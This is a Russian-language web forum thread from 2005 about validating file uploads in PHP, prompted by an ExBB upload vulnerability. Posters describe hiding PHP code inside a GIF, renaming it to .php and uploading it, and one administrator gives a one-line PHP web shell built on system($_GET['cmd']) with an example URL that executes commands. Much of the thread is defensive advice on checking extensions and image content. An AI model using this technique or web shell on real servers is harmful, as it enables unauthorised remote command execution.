Strict Standards: Resource ID#18 used as offset, casting to integer (18) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#23 used as offset, casting to integer (23) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#25 used as offset, casting to integer (25) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#26 used as offset, casting to integer (26) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Что проверять при аплоаде файлов
ТвойWeb ТвойWeb
Качественный Европейский хостинг
 Форум для чайников
 Чат на форуме      Помощь      Поиск      Пользователи


 Страниц (1): [1]   

> Без описания
Поиск в теме | Версия для печати
sl_play
Отправлено: 25 Сентября, 2005 - 15:21:57
Post Id


Junior Member


Покинул форум
Сообщений всего: 74
Дата рег-ции: Июнь 2005  

Карма 0
TvoyWeb пишет:
Обнаружена новая уязвимость в форуме ExBB, позволяющая загружать на форум файлы с любым расширением, маскируя их под графические файлы

на сколькоя понимаю, чтобы выполнялся код в графических файлах нужно это специально указать через .htaccess, думаю никому не придёт в голвоу этого делать просто так, только при конкретной задаче. А как же выполнится допустим пхп-код в графическом файле, если никто ему этого не разрешал?
поправте меня если я не прав...
 
 Top
TvoyWeb Администратор
Отправлено: 25 Сентября, 2005 - 16:43:38
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52




 sl_play
Берем любой gif файл, открываем его в HEX редакторе и в конец кода добавляем PHP код. Сохраняем и переименовываем в файл с расширением *.php. Далее грузим на форум.
Скрипт проверяет миме тип по содержимому а не по расширению.
Затем на странице в тег img вставляется этот псевдо-картинка php файл. Воаля! PHP код в конце кода картинки будет выполняться.
 
 Top
sl_play
Отправлено: 28 Сентября, 2005 - 04:08:17
Post Id


Junior Member


Покинул форум
Сообщений всего: 74
Дата рег-ции: Июнь 2005  

Карма 0




 а если проверять не только миме тайп, а и расширение?
а если вообще не проверять миме тайп, а только расширение?

У меня просто в моих скриптах при загрузки файлов я восновном проверяю расширени, и всегда задумывался правильно ли я делаю...
 
 Top
TvoyWeb Администратор
Отправлено: 28 Сентября, 2005 - 16:28:53
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52
sl_play пишет:
а если проверять не только миме тайп, а и расширение?

Дело в том что миме тип никак не проверишь. То есть то что выдал браузер то и будет в миме типе.
Я делаю так, собственно как здесь на форуме. Всем некартинкам даю произвольное расширение и при запросе на скачивание просто читаю файл и отдаю его с настоящим именем (которое передается при загрузке).
А вот картинки я проверяю, картинка ли это или нет и соответсвующее картинке расширение. Благо на PHP есть функция которая помогает определить картинка это или нет.
 
 Top
sedfom
Отправлено: 27 Октября, 2005 - 15:51:52
Post Id


Newbie


Покинул форум
Сообщений всего: 11
Дата рег-ции: Нояб. 2004  
Откуда: Москва, Россия

Карма 0




 Помогите проверить, есть ли возможность использовать замаскированный под картинку php скрипт в фотогалерее (Coppermine Photo Gallery v1.3.5).

Что-то не получается своять такую картинку. Беру рабочий php-shell открываю его в WinHex-e. Затем открываю gif картинку, там же. Копирую код шелла в картинку. Сохраняю как новый файл gif. Потом переименовываю полученный файл в расширение php. Просто для проверки закачиваю его на сервер через FTP в папку апача. При попытке запуска скрипта в браузере просто пустая белая страница.
 
 Top
Леголегс Администратор
Отправлено: 30 Октября, 2005 - 04:40:20
Post Id



JS-маньяк


Покинул форум
Сообщений всего: 2109
Дата рег-ции: Июль 2004  
Откуда: Липецк

Карма 17




 sedfom
пхп-шелл графический? не так надо. попробуй с таким кодом
CODE:
<?
system($_GET['cmd']);
?>
Открывай в браузере так:
CODE:
surprise_picture.php?cmd=ls > list.txt
В файле list.txt окажется список файлов в директории (а может и не окажется: от прав доступа зависит)
 
 Top
sedfom
Отправлено: 03 Ноября, 2005 - 11:20:03
Post Id


Newbie


Покинул форум
Сообщений всего: 11
Дата рег-ции: Нояб. 2004  
Откуда: Москва, Россия

Карма 0




 Леголегс

Спасибо.

Может кто-нибудь подсказать подобный код для случая с операционной системой FreeBSD (или каким-нибудь Линуксом).

Что касается вышеописанной проблемы (и моей и заголовка темы). Поскольку мне лично вот так с наскоку не удалось разобраться с этой галереей на предмет используемого ей способа загрузки файлов. То я разрешил проблему через настройку Apache + PHP запретом на использование PHP всех системных команд в папке uploads и personal avatars.
 
 Top
Поиск в теме | Версия для печати
Страниц (1): [1]
Сейчас эту тему просматривают: 2 (гостей: 2, зарегистрированных: 0, скрытых: 0)
« PHP/Perl »


Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.
  



Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®
[Script Execution time: 0.0449]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33